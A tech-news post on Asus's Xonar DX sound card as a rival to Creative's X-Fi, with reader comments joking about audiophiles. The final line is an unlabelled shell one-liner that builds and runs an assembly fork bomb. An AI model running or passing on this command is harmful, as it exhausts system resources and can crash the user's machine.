$90 Asus Sound Card Whips Creative's Best
EconolineCrush writes "Sound card giant Creative caught plenty of flak for its recent driver debacle, and has long been criticized for bullying competitors and stifling innovation. But few have been willing to compete with Creative head-on, allowing the company to milk its X-Fi audio processor for more than two and a half years. Now the SoundBlaster has a new challenger in the form of Asus' $90 Xonar DX, which delivers much better sound quality than the X-Fi, PCI Express connectivity, and support for real-time Dolby Digital Live encoding. The Xonar can even emulate the latest EAX positional audio effects, providing the most complete competition to the X-Fi available on the market."
Please don't mod me funny, I'm asking quite seriously. If it runs with open source drivers, does 7.1 and has hardware mixing so that I don't have to bother with dmix, I'm buying it tomorrow morning.
Don't forget the $480 wooden knobs, for that rich, warm sound.
If I have seen further it is by stealing the Intellectual Property of giants.
Lemme guess, you can hear the difference in the sound when using the gold plated optical fiber cables.
At University I had a friend who was an audiophile. One day he came in looking very pissed off. I asked him why and he ranted that one of his female flatmates female friends had told him he was "the sort of man who stops having sex so he could turn over the record".
All those complex arguments I tried to use to convince him he was wrong and that music really does sound better on a decent quality CD player than a vastly more expensive record player were so utterly outmatched by those few words.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;